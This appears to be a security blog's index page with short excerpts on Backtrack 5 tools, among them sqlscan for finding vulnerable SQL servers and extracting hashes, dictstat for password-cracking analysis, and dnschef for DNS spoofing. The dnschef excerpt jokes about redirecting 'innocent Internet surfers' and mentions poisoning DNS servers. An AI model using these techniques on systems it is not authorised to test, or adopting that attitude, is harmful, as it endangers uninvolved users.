Information Security

keepnote – Backtrack 5 – Reporting Tools – Evidence Management – keepnote

KeepNote is a great note taking application installed by default in Backtrack Linux. Notes are an important part of security assessments as well as pretty much any technical projects you work on because there is no way to remember everything that happens in hours of working on a project unless you have good notes. KeepNote provides the ability to create multiple notebooks, directories under those notebooks, and associate actual notes to any level of directories underneath the primary notebook.

Information Security

sqlscan – Backtrack 5 – Information Gathering – Web Application Analysis – Web Crawlers – sqlscan

Need to query Google for vulnerable SQL servers and extract MD5 hashes? The sqlscan.py Python script is your tool then. If you are using Backtrack release 5 you will first need install Python 2.4.4 and then fix sqlscan.py by following the instructions here and here. Once you have sqlscan.py functioning without errors proceed to the example below.

Information Security

dictstat – Backtrack 5 – Privilege Escalation – Password Attacks – Offline Attacks – dictstat

The dictstat Python script is a great little tool for password cracking results analysis or for regular wordlist analysis. The dictstat application is located in the /pentest/passwords/pack directory on Backtrack 5 R3 and can be run using “python dictstat.py” from within that directory. Written by iphelix during the 2010 Crack Me If You Can password cracking competition and is part of a larger toolset called PACK or Password Analysis and Cracking Kit. Below we show some examples of dictstat in action along with some details of the available parsing mechanisms that are in place.

Information Security

spamhole – Backtrack 5 – Exploitation Tools – Social Engineering Tools – HoneyPots – spamhole

Unfortunately spamhole’s day is mostly behind us though I wish I would have been familiar with it earlier. The spamhole application developers took the approach of developing spamhole for other like minded individuals to assist in battling the SPAM issues on the Internet by creating fake open mail relays as possible and thus tricking spammers into sending their SPAM into blackholes or honeypots. It would have been extremely satisfying to watch SPAM enter a spamhole fake open relay I had created and be redirected to nothing. The spamhole application is not working as of Backtrack 5 R3 and is explained in more detail below.

Information Security

dnschef – Backtrack – Privilege Escalation – Spoofing Attacks – Network Spoofing – dnschef

If you want to spoof some DNS requests then dnschef is the tool to do it. I can never get enough of redirecting innocent Internet surfers to random locations. The main key for dnschef to be extremely useful is the fact that you will have to somehow get the traffic to the Backtrack Linux server running dnschef which could be done by gaining access and modifying DNS entries on a single server or by poisoning the real DNS server on a network. Below we show a couple examples of dnschef in action but overall it is really easy to use and the hard part will be figuring out the method you use to get the DNS (Domain Name Server) traffic to the Backtrack server running dnschef.